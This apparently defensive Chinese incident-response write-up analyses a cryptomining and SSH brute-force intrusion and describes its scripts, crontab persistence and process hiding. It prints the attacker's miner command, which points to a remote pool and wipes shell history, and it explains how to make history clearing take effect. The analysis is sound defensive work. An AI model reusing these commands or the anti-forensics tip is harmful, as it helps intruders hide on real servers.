记一次黑产利用思路学习

最近做了一个应急响应,但是环境被破坏得太厉害了,除了入侵者本身留下的东西清理了一部分,甲方人员不会做现场保存处理也导致丢失了很多东西,溯源无从查起,但是从剩下的文件里可以看到入侵者的思路,学习一下

首先,入侵者的解压出来的文件夹应该有两个,一个用于挖矿,一个用于扫描
首先从日志进行分析

日志.jpg

日志中可以看到上来后从远程拉了个压缩包并解压,然后拉入了个a2.txt并且执行了perl脚本。
这里的users和a2文件都被销毁了,所以无法查证其具体作用,但是根据思路分析猜测a2应该是配置文件,perl文件可能是用来执行后续一系列shell脚本以便于隐藏执行的shell命令。

至于为什么这里的history文件还留着,最后解释,有点骚。

文件分析

我们先看看真正起作用的shell脚本
挖矿程序目录下入口文件为x,其内容为nohup ./a >>/dev/null &
跟a文件内容,
入口a.jpg

其作用是将upd加入定时计划中去,然后执行run文件,继续跟run文件
run文件.jpg

可以看到bash.pid里的pid是a文件的pid,在run中会被kill掉,run中执行的真正的挖矿程序md,分别对应不同的CPU,h32和h64是用于隐藏启动进程的命令。

—————丑陋的分割线—————————

扫描程序目录下入口文件为x,其内容为nohup ./a >>/dev/null &
继续跟a文件,内容如图
入口a.jpg

从远程服务器下载了配置文件,其中d.php为目录,feedp.php文件内容为随机拉取得弱口令,BSSH是一款开源的ssh爆破工具,需要文件i(ip列表配置文件)和文件p(存放密码字典配置文件),爆破成功的信息输出为文件v,所以看到这里把v覆写了没留东西,而爆破成功的信息通过访问记录带去了远程服务器。

这里有一个地方很可惜,就是每个循环中间的rf命令后面跟的东西,由于环境没有了,不知道是什么情况,没法学习一波。

理理思路

总的理一下思路,通过22端口进来,拉文件,执行命令,然后放一个很显眼的诱饵离开。

这次整个过程中,最有意思的就是那个命令nohup ./pk -u Godz56@protonmail.com -o 46.4.120.155:45560 -p x -F; clear; history -c
之所以还能看到点东西是因为在管理员登陆上去之后一波操作直接reboot,连kill挖矿进程都没有,所以history记录得以保存,最后一句nohup ./pk -u Godz56@protonmail.com -o 46.4.120.155:45560 -p x -F; clear; history c这里如果进程被任何方式停掉,都会清除掉所有history.

说到history,每个bash登陆都会有个命令缓存,history -c只会清除缓存中内容,最后还需要我们关闭掉bash才会追加到~/.bash_history中去,所以需要注意,再当前shell中执行history -c后需要有exit的动作才能成功。

后记

最近又看到很多应急的案例,基本上都是公开web漏洞或者配置问题+弱口令进来的,主要是在进来后留恶意样本的手段,大部分就是挖矿+扫描蠕虫+定时计划,稍微难一点的会做用户级的rootkit(目前接触的还不是太高深)以及做一些保护进程的手段,再我觉得难的就是清干净所有关键日志记录并用上一些奇奇怪怪的非技术手段。
就目前来看,感觉是清理干净日志,恶意行为占资源小一点,最好不带蠕虫的,清干净日志基本就很难去溯源了,就算要溯源也要有其他设备获取到一些流量或者其他东西来进行溯源,不过还是可以从一些系统进程行为和软件的行为和内容来对恶意文件的执行过程进行推测,还有日回去也是一个思路。
PDCERF模型


Comments are closed.